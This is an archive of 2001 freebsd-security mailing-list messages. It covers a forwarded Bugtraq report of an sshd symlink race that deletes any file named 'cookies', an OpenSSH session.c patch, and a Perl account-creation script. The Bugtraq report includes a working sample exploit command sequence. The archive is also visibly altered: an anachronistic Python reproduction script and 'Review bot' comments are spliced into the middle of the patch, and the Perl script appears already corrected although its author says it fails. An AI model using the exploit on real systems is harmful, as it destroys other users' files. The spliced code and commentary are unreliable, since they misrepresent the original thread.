Received: from mail.webmonster.de (datasink.webmonster.de [194.162.162.209]) by hub.freebsd.org (Postfix) with SMTP id 5BC7037B401 for ; Tue, 5 Jun 2001 15:12:44 -0700 (PDT) (envelope-from karsten@rohrbach.de)
Received: (qmail 87297 invoked by uid 1000); 5 Jun 2001 22:13:03 -0000
Date: Wed, 6 Jun 2001 00:13:03 +0200
From: "Karsten W. Rohrbach" To: "Peter C. Lai" Cc: freebsd-security@freebsd.org Subject: Re: "Legal Disclaimers" Was: Apache Software Foundation Server compromised, resecured. Message-ID: <20010606001303.G86212@mail.webmonster.de> Mail-Followup-To: "Karsten W. Rohrbach" , "Peter C. Lai" , freebsd-security@freebsd.org References: <20010604194220.93548.qmail@web11807.mail.yahoo.com> <20010604151245.A15758@NOC.maKintosh.com> <003d01c0edcb$702fd1e0$8caa6389@resnet.uconn.edu> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="m972NQjnE83KvVa/" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <003d01c0edcb$702fd1e0$8caa6389@resnet.uconn.edu>; from sirmoo@cowbert.2y.net on Tue, Jun 05, 2001 at 10:25:57AM -0400 X-Arbitrary-Number-Of-The-Day: 42 X-URL: http://www.webmonster.de/ X-Disclaimer: My opinions do not necessarily represent those of my employer Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --m972NQjnE83KvVa/ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Peter C. Lai(sirmoo@cowbert.2y.net)@2001.06.05 10:25:57 +0000: > The truth is, that many companies and private organizations actually do > filter all mail not just for viruses but many do it for "non-work-related" > activities, because they feel that one shouldn't use company bandwidth to [...] some users cannot quote correctly (me too, sometimes). some users use badly broken MUA software: --- > X-MSMail-Priority: Normal > X-Mailer: Microsoft Outlook Express 5.50.4522.1200 > X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 --- some users are unable to use pgp. several others got the clue. several are "enabled". do you want to be enabled, too? 
/k -- > I can emulate the Beta-version of every C #include > program I've ever written in two lines! -> main() {raise(11);} KR433/KR11-RIPE -- WebMonster Community Founder -- nGENn GmbH Senior Techie http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.net/ karsten&rohrbach.de -- alpha&ngenn.net -- alpha&scene.org -- catch@spam.de GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 BF46 --m972NQjnE83KvVa/ Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7HVlvM0BPTilkv0YRAl/vAKDCSerQ6wAVqBcccY2foGZZjh4fgwCgprZh 34EgA/medzdaoI0yWGzQ+eA= =LfEK -----END PGP SIGNATURE----- --m972NQjnE83KvVa/-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 6 2:47:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from burka.carrier.kiev.ua (burka.carrier.kiev.ua [193.193.193.107]) by hub.freebsd.org (Postfix) with ESMTP id 650A537B407 for ; Wed, 6 Jun 2001 02:47:06 -0700 (PDT) (envelope-from netch@lucky.net) Received: from netch@localhost (netch@localhost) by burka.carrier.kiev.ua id MSC30966 for security@freebsd.org; Wed, 6 Jun 2001 12:47:02 +0300 (EEST) (envelope-from netch) Date: Wed, 6 Jun 2001 12:47:02 +0300 
From: Valentin Nechayev To: security@freebsd.org Subject: [fwd] SSH allows deletion of other users files... Message-ID: <20010606124702.A30808@lucky.net> Reply-To: netch@lucky.net Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="7JfCtLOvnd9MIVvH" Content-Disposition: inline X-42: On Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --7JfCtLOvnd9MIVvH Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Is it applicable to FreeBSD? (BugTraq contains report that it is) /netch --7JfCtLOvnd9MIVvH Content-Type: message/rfc822 Content-Disposition: inline Return-Path: Received: from outgoing3.securityfocus.com [66.38.151.27] by burka.carrier.kiev.ua with ESMTP id SHL33333 for ; Mon, 4 Jun 2001 18:19:18 +0300 (EEST) (envelope-from bugtraq-return-246-netch=lucky.net@securityfocus.com) Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19]) by outgoing.securityfocus.com (Postfix) with SMTP id 42FFBA54B0 for ; Mon, 4 Jun 2001 09:19:10 -0600 (MDT) Received: (qmail 17878 invoked by alias); 4 Jun 2001 14:55:02 -0000 Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm Precedence: bulk List-Id: List-Post: List-Help: List-Unsubscribe: List-Subscribe: Delivered-To: mailing list bugtraq@securityfocus.com Delivered-To: moderator for bugtraq@securityfocus.com Received: (qmail 10486 invoked from network); 4 Jun 2001 10:12:01 -0000 Date: Mon, 4 Jun 2001 22:14:29 +1200 (NZST) 
From: X-X-Sender: To: Subject: SSH allows deletion of other users files... Message-ID: Mime-Version: 1.0 Content-Transfer-Encoding: 8bit Content-Type: text/plain; charset=koi8-u SSH allows deletion of other users files. ========================================= You can delete any file on the filesystem you want... as long as its called cookies. Not really a very useful bug, but could cause annoyances to people who actually like their cookies. /home/zen/.netscape/cookies sample exploit:- [root@clarity /root]# touch /cookies;ls /cookies /cookies [root@clarity /root]# ssh zen@localhost zen@localhost's password: Last login: Mon Jun 4 20:22:39 2001 from localhost.local Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown [zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9 [zen@clarity zen]$ logout Connection to localhost closed. [root@clarity /root]# ls /cookies /bin/ls: /cookies: No such file or directory --zen-parse --7JfCtLOvnd9MIVvH-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 6 3:48:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from consistent.unicore.no (transmogrify.unicore.no [194.19.38.10]) by hub.freebsd.org (Postfix) with ESMTP id BD2AB37B406 for ; Wed, 6 Jun 2001 03:48:26 -0700 (PDT) (envelope-from andreas@consistent.unicore.no) Received: (from andreas@localhost) by consistent.unicore.no (8.11.1/8.11.1) id f56AmMS26597 for security@freebsd.org; Wed, 6 Jun 2001 12:48:22 +0200 (CEST) (envelope-from andreas) Date: Wed, 6 Jun 2001 12:48:22 +0200 
From: Andreas Haugsnes To: security@freebsd.org Subject: Re: [fwd] SSH allows deletion of other users files... Message-ID: <20010606124822.A26583@consistent.unicore.no> References: <20010606124702.A30808@lucky.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010606124702.A30808@lucky.net>; from netch@lucky.net on Wed, Jun 06, 2001 at 12:47:02PM +0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I've tested it with FreeBSD 4.3, and I have not found this bug to apply. - Andreas Haugsnes On Wed, Jun 06, 2001 at 12:47:02PM +0300, Valentin Nechayev wrote: > Is it applicable to FreeBSD? > (BugTraq contains report that it is) > > > /netch To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 6 4:11:30 2001 Delivered-To: freebsd-security@freebsd.org Received: from consistent.unicore.no (transmogrify.unicore.no [194.19.38.10]) by hub.freebsd.org (Postfix) with ESMTP id ED01B37B403 for ; Wed, 6 Jun 2001 04:11:27 -0700 (PDT) (envelope-from andreas@consistent.unicore.no) Received: (from andreas@localhost) by consistent.unicore.no (8.11.1/8.11.1) id f56BBUm26648 for security@freebsd.org; Wed, 6 Jun 2001 13:11:30 +0200 (CEST) (envelope-from andreas) Date: Wed, 6 Jun 2001 13:11:30 +0200 
From: Andreas Haugsnes To: security@freebsd.org Subject: Re: [fwd] SSH allows deletion of other users files... Message-ID: <20010606131130.A26605@consistent.unicore.no> References: <20010606124702.A30808@lucky.net> <20010606124822.A26583@consistent.unicore.no> <20010606125321.A56634@mithrandr.moria.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010606125321.A56634@mithrandr.moria.org>; from nbm@mithrandr.moria.org on Wed, Jun 06, 2001 at 12:53:21PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Ahh, tested it now, yes, it is vulnerable. But wouldn't an easy workaround be to disable all X11 forwarding in sshd? I had it set to 'no' here, but that was not the default. - Andreas Haugsnes On Wed, Jun 06, 2001 at 12:53:21PM +0200, Neil Blakey-Milner wrote: > > Are you using X forwarding? (ie, ssh -X) > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 6 4:34:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 6504337B401 for ; Wed, 6 Jun 2001 04:34:35 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 46861 invoked by uid 1000); 6 Jun 2001 11:33:24 -0000 Date: Wed, 6 Jun 2001 14:33:23 +0300 
From: Peter Pentchev To: Andreas Haugsnes Cc: security@freebsd.org Subject: Re: [fwd] SSH allows deletion of other users files... Message-ID: <20010606143323.G18735@ringworld.oblivion.bg> Mail-Followup-To: Andreas Haugsnes , security@freebsd.org References: <20010606124702.A30808@lucky.net> <20010606124822.A26583@consistent.unicore.no> <20010606125321.A56634@mithrandr.moria.org> <20010606131130.A26605@consistent.unicore.no> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010606131130.A26605@consistent.unicore.no>; from andreas@haugsnes.no on Wed, Jun 06, 2001 at 01:11:30PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 06, 2001 at 01:11:30PM +0200, Andreas Haugsnes wrote: > Ahh, tested it now, yes, it is vulnerable. > But wouldn't an easy workaround be too disable all X11-forwarding in sshd? > I had it to 'no' here, but that was not per default. > > > - Andreas Haugsnes > > On Wed, Jun 06, 2001 at 12:53:21PM +0200, Neil Blakey-Milner wrote: > > > > Are you using X forwarding? (ie, ssh -X) Yes, disabling X forwarding would be an easy workaround. Can somebody, however, test if the following patch resolves the problem? It certainly does for me.. Well, ok, so there is still a race condition between the stat() and unlink() in the cleanup procedure.. but since there is no funlink() yet, I do not really think this one can be resolved :( And besides, there's a *much* smaller window of opportunity there. The attached patch is against RELENG_4, but it applies cleanly to the newer OpenSSH in -current. G'luck, Peter -- No language can express every thought unambiguously, least of all this one. 
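The symlink trick from the Bugtraq post forwarded above (rm -r /tmp/ssh-XXW9hNY9; ln -s / /tmp/ssh-XXW9hNY9, then let sshd's cleanup run) and the stat()/unlink() window Peter mentions, reproduced as an added example that is not code from the thread or from OpenSSH. It stages the scenario under a private temporary tree, with a victim/ directory standing in for /, so it runs unprivileged; it assumes a Unix Python with O_NOFOLLOW and unlink(dir_fd=) support. The second cleanup shows the alternative to comparing dev/ino after the fact: open the session directory itself without following symlinks and unlink relative to that descriptor (unlinkat), so there is no second path resolution for the user to race.

```python
"""Reproduce the /tmp/ssh-XXXXXXXX/cookies cleanup race in a scratch tree."""
import os
import tempfile


def naive_cleanup(sessdir):
    """The 2001 behaviour: unlink() by path.  Every path component is
    resolved afresh, so if sessdir has been replaced by a symlink the file
    that goes away is <link target>/cookies, with the caller's privileges."""
    try:
        os.unlink(os.path.join(sessdir, "cookies"))
        return True
    except OSError:
        return False


def safe_cleanup(sessdir):
    """Open the session directory itself with O_NOFOLLOW|O_DIRECTORY and
    unlink relative to that descriptor (unlinkat(2)).  The object checked is
    the object used, so re-pointing the path afterwards cannot redirect
    the delete; a symlink is refused with ELOOP at the open()."""
    try:
        dfd = os.open(sessdir, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW)
    except OSError:
        return False
    try:
        os.unlink("cookies", dir_fd=dfd)
        return True
    except OSError:
        return False
    finally:
        os.close(dfd)


def victim_survives(cleanup):
    """Stage the Bugtraq scenario under a private temp tree (victim/ stands
    in for /, so nothing privileged is needed), run `cleanup` on the
    per-session directory and report whether victim/cookies is still there."""
    with tempfile.TemporaryDirectory() as base:
        victim_dir = os.path.join(base, "victim")
        victim = os.path.join(victim_dir, "cookies")
        sess = os.path.join(base, "ssh-XXW9hNY9")
        # what sshd set up: a session dir owned by the user, with its cookie file
        os.mkdir(victim_dir)
        open(victim, "w").close()
        os.mkdir(sess)
        open(os.path.join(sess, "cookies"), "w").close()
        # the user, before logging out:
        #   rm -r /tmp/ssh-XXW9hNY9; ln -s / /tmp/ssh-XXW9hNY9
        os.unlink(os.path.join(sess, "cookies"))
        os.rmdir(sess)
        os.symlink(victim_dir, sess)
        # session teardown, run by the daemon
        cleanup(sess)
        return os.path.exists(victim)


if __name__ == "__main__":
    for fn in (naive_cleanup, safe_cleanup):
        state = "survived" if victim_survives(fn) else "DELETED"
        print(f"{fn.__name__}: victim cookies file {state}")
```

The same idea applies to the rmdir() that follows the unlink() in sshd: hold the parent (/tmp) open and remove the session directory with unlinkat(AT_REMOVEDIR) relative to it, or simply do the whole teardown under the user's uid, which the creation path already does around the open().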
Index: src/crypto/openssh/session.c =================================================================== RCS file: /home/ncvs/src/crypto/openssh/session.c,v retrieving revision 1.4.2.8 diff -u -r1.4.2.8 session.c --- src/crypto/openssh/session.c 2001/03/22 00:28:35 1.4.2.8 +++ src/crypto/openssh/session.c 2001/06/06 11:29:07 @@ -116,6 +116,7 @@ /* Local Xauthority file. */ static char *xauthfile; +static struct stat xauthfile_sbuf; /* original command from peer. */ char *original_command = NULL; @@ -138,6 +139,33 @@ if (xauthfile != NULL) { char *p; + struct stat sb; + + if ((xauthfile_sbuf.st_dev != 0) || + (xauthfile_sbuf.st_ino != 0)) { + debug("xauthfile sbuf/ino != 0, checking.."); + if (stat(xauthfile, &sb) == -1) { + error("cannot stat xauthfile %s: %s", + xauthfile, strerror(errno)); + /* bail out, do not remove! */ + xfree(xauthfile); + xauthfile = NULL; + return; + } + if ((sb.st_dev != xauthfile_sbuf.st_dev) || + (sb.st_ino != xauthfile_sbuf.st_ino)) { + error("xauthfile dev/ino mismatch! " + "expected: %lu/%lu, got %lu/%lu", + xauthfile_sbuf.st_dev, + xauthfile_sbuf.st_ino, + sb.st_dev, sb.st_ino); + /* bail out, do not remove! */ + xfree(xauthfile); + xauthfile = NULL; + return; + } + debug("sbuf/ino match"); + } unlink(xauthfile); p = strrchr(xauthfile, '/'); if (p != NULL) { @@ -322,6 +350,7 @@ break; /* Setup to always have a local .Xauthority. */ + memset(&xauthfile_sbuf, 0, sizeof(xauthfile_sbuf)); xauthfile = xmalloc(MAXPATHLEN); strlcpy(xauthfile, "/tmp/ssh-XXXXXXXX", MAXPATHLEN); temporarily_use_uid(pw->pw_uid); 
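Review bot: the new file-scope `static struct stat xauthfile_sbuf;` at @@ -116,6 +116,7 @@ is overloaded as both the recorded identity and the "nothing recorded" sentinel (st_dev == 0 and st_ino == 0). Inode 0 is not reserved on every filesystem, and a fresh memset() and a failed fstat() are indistinguishable from each other. Record validity explicitly, e.g. `static int xauthfile_sbuf_valid;` set only after a successful fstat(), and key the cleanup check on that flag.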
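Review bot: in xauthfile_cleanup_proc (@@ -138,6 +139,33 @@) the dev/ino comparison is skipped, and the old unconditional `unlink(xauthfile);` runs, whenever xauthfile_sbuf is all zero, which is exactly the state the creation path leaves behind after a failed fstat() (it memsets the record). The failure mode should be the conservative one: with no recorded identity, do not remove. Move `unlink(xauthfile);` inside the `if` block and return early otherwise. The stat()/unlink() window the cover note mentions can also be closed without funlink(): perform the unlink() and rmdir() under temporarily_use_uid() for the session user, as the creation path already does around open(). The file was created as that user, so a symlink pointing at a root-owned /cookies can no longer be followed to a deletion the user could not perform anyway. Note that the SSH1 path registers the cleanup with a NULL argument (`fatal_add_cleanup(xauthfile_cleanup_proc, NULL);`), so the uid would have to be stashed next to xauthfile_sbuf rather than read from `s`.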
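Review bot: the fstat() block introduced at @@ -336,8 +365,20 @@ is repeated verbatim at @@ -1667,8 +1709,17 @@ (with different wrapping: the second copy runs past 80 columns), and the memset() at @@ -322,6 +350,7 @@ is repeated at @@ -1651,6 +1692,7 @@. Factor the record/reset into one helper, e.g. `static void xauthfile_record(int fd)`, so the SSH1 and SSH2 X11 paths cannot drift apart. Also, `%lu` is used with st_dev and st_ino in the debug() and error() calls, but dev_t and ino_t are 32-bit types on FreeBSD 4.x; cast them to (unsigned long) to keep the format strings correct.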
@@ -336,8 +365,20 @@ } strlcat(xauthfile, "/cookies", MAXPATHLEN); fd = open(xauthfile, O_RDWR|O_CREAT|O_EXCL, 0600); - if (fd >= 0) + if (fd >= 0) { + if (fstat(fd, &xauthfile_sbuf) == -1) { + debug("fstat(xauthfile) failed: %s", + strerror(errno)); + memset(&xauthfile_sbuf, 0, + sizeof(xauthfile_sbuf)); + } else { + debug("fstat(xauthfile) success: " + "dev %lu, ino %lu", + xauthfile_sbuf.st_dev, + xauthfile_sbuf.st_ino); + } close(fd); + } restore_uid(); fatal_add_cleanup(xauthfile_cleanup_proc, NULL); success = 1; @@ -1651,6 +1692,7 @@ xfree(s->auth_data); return 0; } + memset(&xauthfile_sbuf, 0, sizeof(xauthfile_sbuf)); xauthfile = xmalloc(MAXPATHLEN); strlcpy(xauthfile, "/tmp/ssh-XXXXXXXX", MAXPATHLEN); temporarily_use_uid(s->pw->pw_uid); @@ -1667,8 +1709,17 @@ } strlcat(xauthfile, "/cookies", MAXPATHLEN); fd = open(xauthfile, O_RDWR|O_CREAT|O_EXCL, 0600); - if (fd >= 0) + if (fd >= 0) { + if (fstat(fd, &xauthfile_sbuf) == -1) { + debug("fstat(xauthfile) failed: %s", + strerror(errno)); + memset(&xauthfile_sbuf, 0, sizeof(xauthfile_sbuf)); + } else { + debug("fstat(xauthfile) success: dev %lu, ino %lu", + xauthfile_sbuf.st_dev, xauthfile_sbuf.st_ino); + } close(fd); + } restore_uid(); fatal_add_cleanup(xauthfile_cleanup_proc, s); return 1; To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 6 8:12:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from slis-two.lis.fsu.edu (slis-two.lis.fsu.edu [128.186.72.102]) by hub.freebsd.org (Postfix) with ESMTP id F014637B40A for ; Wed, 6 Jun 2001 08:12:16 -0700 (PDT) (envelope-from david@slis-two.lis.fsu.edu) Received: from localhost (david@localhost) by slis-two.lis.fsu.edu (8.11.1/8.11.1) with ESMTP id f56FE3049936 for ; Wed, 6 Jun 2001 11:14:03 -0400 (EDT) (envelope-from david@slis-two.lis.fsu.edu) Date: Wed, 6 Jun 2001 11:14:03 -0400 (EDT) 
From: David Miner To: Subject: Encrypted passwords Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org A while back there was a good discussion on using encrypted passwords to "automatically" create user accounts. I have a need to create classroom accounts every semester and (borrowing freely from adduser) created the following perl script. But something is not right and I have to go in and manually change the passwords to what I want. The program asks for a password file name and the file contains passwords that I have approved as meeting my standards. The problem seems to be in how they get encrypted. Suggestions, please?
-------------------Begin Program-----------------------
#!/usr/bin/perl
use strict;
use warnings;

# pw(8) and chpass(1) need root.
sub check_root {
    die "You are not root!\n" if $< != 0;
}

# Eight characters from the crypt(3) salt alphabet.  Indexing with
# int(rand(@itoa64)) instead of a bitmask lets every character occur.
sub salt {
    my @itoa64 = ( '.', '/', '0' .. '9', 'A' .. 'Z', 'a' .. 'z' );  # 0 .. 63
    my $salt = '';
    $salt .= $itoa64[ int(rand(@itoa64)) ] for 1 .. 8;
    return $salt;
}

# Read the pre-approved passwords, one per line.  chomp() matters: lines
# read from a filehandle keep their newline, and crypt("secret\n", ...)
# is not the hash of "secret".
sub get_pw_file {
    print "Enter password file name: ";
    chomp(my $read = <STDIN>);
    open(my $p1, '<', $read) or die "cannot open $read: $!\n";
    my @pwd1 = <$p1>;
    close $p1;
    chomp(@pwd1);
    print "Password file read\n";
    return @pwd1;
}

# main
check_root();
my @pwd1 = get_pw_file();
print "Enter path to home directories: ";
chomp(my $home = <STDIN>);           # default HOME
print "Enter class name: ";
chomp(my $class = <STDIN>);          # class name
print "Enter first number wanted: ";
chomp(my $first = <STDIN>);          # first number wanted
print "Enter number of users wanted: ";
chomp(my $count = <STDIN>);          # number of users wanted
my $shell = "/bin/csh";
open(my $del, '>', "$class-del") or die "cannot write $class-del: $!\n";
open(my $pwd, '>', "$class-pwd") or die "cannot write $class-pwd: $!\n";

for (my $n = $first; $n < $first + $count; $n++) {
    my $name     = "$class-$n";
    my $fullname = "LIS$name";
    my $userhome = "$home/$name";
    my $plain    = $pwd1[$n];
    defined $plain or die "no password in file for $name\n";
    print "$name $plain\n";
    print $del "pw userdel -n $name\n";
    print $pwd "The password for $name is $plain\n";
    my $cryptpwd = crypt($plain, salt());
    # List-form system() runs the program directly, without /bin/sh.
    # A single string like "chpass -p $cryptpwd $name" handed to the
    # shell would have the $1$salt$ parts of an MD5 hash expanded as
    # shell variables before chpass ever saw them.
    system('pw', 'useradd', '-n', $name, '-c', $fullname, '-d', $userhome,
           '-s', $shell, '-m') == 0 or die "pw useradd $name failed\n";
    system('chpass', '-p', $cryptpwd, $name) == 0
        or die "chpass $name failed\n";
    system('mkdir', "$userhome/public_html");
    system('chmod', '755', "$userhome/public_html");
    system('chown', "$name:websitedev", "$userhome/public_html");
}
close $del;
close $pwd;
-----------------End program-------------------------
--------------------------------------------------------------------- David R.
Miner miner@lis.fsu.edu Systems Integrator voice: 850-644-8107 School of Information Studies fax: 850-644-6253 Florida State University Tallahassee, FL 32306-2100 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 6 8:30:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from sbtx.tmn.ru (sbtx.tmn.ru [212.76.160.49]) by hub.freebsd.org (Postfix) with ESMTP id 4352B37B406 for ; Wed, 6 Jun 2001 08:30:34 -0700 (PDT) (envelope-from serg@sbtx.tmn.ru) Received: from sv.tech.sibitex.tmn.ru (sv.tech.sibitex.tmn.ru [212.76.160.59]) by sbtx.tmn.ru (8.11.3/8.11.3) with ESMTP id f56FUVI31317; Wed, 6 Jun 2001 21:30:33 +0600 (YEKST) (envelope-from serg@sbtx.tmn.ru) Received: (from serg@localhost) by sv.tech.sibitex.tmn.ru (8.11.3/8.11.3) id f56FUQj00771; Wed, 6 Jun 2001 21:30:26 +0600 (YEKST) (envelope-from serg) Date: Wed, 6 Jun 2001 21:30:26 +0600 
From: "Sergey N. Voronkov" To: David Miner Cc: freebsd-security@FreeBSD.ORG Subject: Re: Encrypted passwords Message-ID: <20010606213026.A755@sv.tech.sibitex.tmn.ru> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from david@slis-two.lis.fsu.edu on Wed, Jun 06, 2001 at 11:14:03AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 06, 2001 at 11:14:03AM -0400, David Miner wrote: > A while back there was a good discussion on using encrypted passwords to > "automatically" create user accounts. > > I have a need to create classroom accounts every semester and (borrowing > freely from adduser) created the following perl script. > > But something is not right and I have to go in and manually change the > passwords to what I want. > > The program asks for a password file name and the file contains passwords > that I have approved as meeting my standards. The problem seems to be in > how they get encrypted. > > Suggestions, please? Please look at http://www.FreeBSD.org/cgi/query-pr.cgi?pr=24953 I've posted a hook against DES/MD5 encryption. Bye, Serg. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 6 8:49:32 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.cs.ait.ac.th (mail.cs.ait.ac.th [192.41.170.16]) by hub.freebsd.org (Postfix) with ESMTP id E50E437B401 for ; Wed, 6 Jun 2001 08:49:28 -0700 (PDT) (envelope-from Olivier.Nicole@ait.ac.th) Received: from bazooka.cs.ait.ac.th (on@bazooka.cs.ait.ac.th [192.41.170.2]) by mail.cs.ait.ac.th (8.11.3/8.9.3) with ESMTP id f56M2MB08283; Thu, 7 Jun 2001 05:02:23 +0700 (ICT) 
From: Olivier Nicole Received: (from on@localhost) by bazooka.cs.ait.ac.th (8.8.5/8.8.5) id WAA02105; Wed, 6 Jun 2001 22:49:11 +0700 (ICT) Date: Wed, 6 Jun 2001 22:49:11 +0700 (ICT) Message-Id: <200106061549.WAA02105@bazooka.cs.ait.ac.th> To: david@slis-two.lis.fsu.edu Cc: freebsd-security@FreeBSD.ORG In-reply-to: (message from David Miner on Wed, 6 Jun 2001 11:14:03 -0400 (EDT)) Subject: Re: Encrypted passwords Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >The program asks for a password file name and the file contains passwords >that I have approved as meeting my standards. The problem seems to be in >how they get encrypted. Could you please be more specific? What do you mean it is not working? By the way, if anyone is interested, I can provide the Perl script that generates passwords like that: http://www.cs.ait.ac.th/cgi-bin/phi-soft/gen-multipasswd It used to produce English-like words, but I recently added numbers and non-alphanumerical characters, so it became ugly. It was preliminarily based on some statistics about sets of 2 and 3 letters, the way they appear in English words (some pages of the Unix manual being the input :) Olivier To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 6 9: 1:11 2001 Delivered-To: freebsd-security@freebsd.org Received: from slis-two.lis.fsu.edu (slis-two.lis.fsu.edu [128.186.72.102]) by hub.freebsd.org (Postfix) with ESMTP id 6374137B401 for ; Wed, 6 Jun 2001 09:01:08 -0700 (PDT) (envelope-from david@slis-two.lis.fsu.edu) Received: from localhost (david@localhost) by slis-two.lis.fsu.edu (8.11.1/8.11.1) with ESMTP id f56G2iS50691; Wed, 6 Jun 2001 12:02:44 -0400 (EDT) (envelope-from david@slis-two.lis.fsu.edu) Date: Wed, 6 Jun 2001 12:02:44 -0400 (EDT) 
From: David Miner To: Olivier Nicole Cc: Subject: Re: Encrypted passwords In-Reply-To: <200106061549.WAA02105@bazooka.cs.ait.ac.th> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 6 Jun 2001, Olivier Nicole wrote: > >The program asks for a password file name and the file contains passwords > >that I have approved as meeting my standards. The problem seems to be in > >how they get encrypted. > > Could you please be more specific? What do you mean it is not working? > Thanks to Sergey and Olivier, I have something else to look at. Also I see that my description of the problem was not sufficient. The passwords I pre-generate. I take a random name generator and run it several times, go in and add numbers and special characters and create a single text file. I then sort this file starting at character position 2 and incrementing until I have several files with the same passwords but in different order. But when I encrypt them and put them in the passwd file, they do not allow the user to log in. I have to use the passwd program to manually change them to the same password that I wanted originally. Thus I believe the problem lies in the encryption method or how it is being passed to the chpass program. When I inspect the passwd file with vipw, I see the encrypted password, but it just does not allow the user to log in. Thanks, David --------------------------------------------------------------------- David R. 
Miner miner@lis.fsu.edu Systems Integrator voice: 850-644-8107 School of Information Studies fax: 850-644-6253 Florida State University Tallahassee, FL 32306-2100 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 6 9:10:37 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.cs.ait.ac.th (mail.cs.ait.ac.th [192.41.170.16]) by hub.freebsd.org (Postfix) with ESMTP id 6461537B406 for ; Wed, 6 Jun 2001 09:10:10 -0700 (PDT) (envelope-from Olivier.Nicole@ait.ac.th) Received: from bazooka.cs.ait.ac.th (on@bazooka.cs.ait.ac.th [192.41.170.2]) by mail.cs.ait.ac.th (8.11.3/8.9.3) with ESMTP id f56MQvB08376; Thu, 7 Jun 2001 05:26:57 +0700 (ICT) 
